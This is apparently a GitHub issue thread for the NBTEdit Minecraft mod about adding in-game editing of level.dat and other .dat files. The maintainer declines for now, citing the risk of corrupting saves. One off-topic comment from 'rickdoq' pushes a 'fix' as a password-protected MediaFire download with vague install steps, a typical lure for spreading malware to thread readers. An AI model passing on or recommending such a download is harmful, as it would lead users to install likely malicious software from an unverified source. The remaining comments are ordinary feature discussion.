### ISSUE TITLE
The ability to be able to edit the world data

### ISSUE THREAD

**Issue by DavidTheTech** [MeowCraftMC/NBTEdit#44]
To be able to edit other dat files like level.dat or other dat files from different mods.
a file view to select a .dat file to edit that would be nice.

**Comment by qyl27** [comment]
Editing world files on disk in-game is dangerous, it may break your saves, you'd better quit the world and edit through some software like [NBTStudio](https://github.com/tryashtar/nbt-studio).

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by DavidTheTech** [comment]
That's fair enough, was just thinking it would make things a bit more efficient when doing map stuff, would a warning message help that explains the danger before clicking a confirm button?

**Comment by qyl27** [comment]
Providing file editing stuff is an implicit warranty of the functional, but actually, we can't. So I won't do that.

**Comment by DraconicNEO** [comment]
Why not like add an option to do it only from the world select screen, as an edit menu instead of loading the world. Tools like NBTstudio are nice but also aren't cross platform.

**Comment by qyl27** [comment]
> Why not like add an option to do it only from the world select screen, as an edit menu instead of loading the world. Tools like NBTstudio are nice but also aren't cross platform.

I can't imagine a platform can launch Minecraft JE but didn't have dotnet, what device is it?  
Anyway, I agree we can do it, and I want it. If NBTEdit has a better editing GUI to replace it. (Maybe after #55)
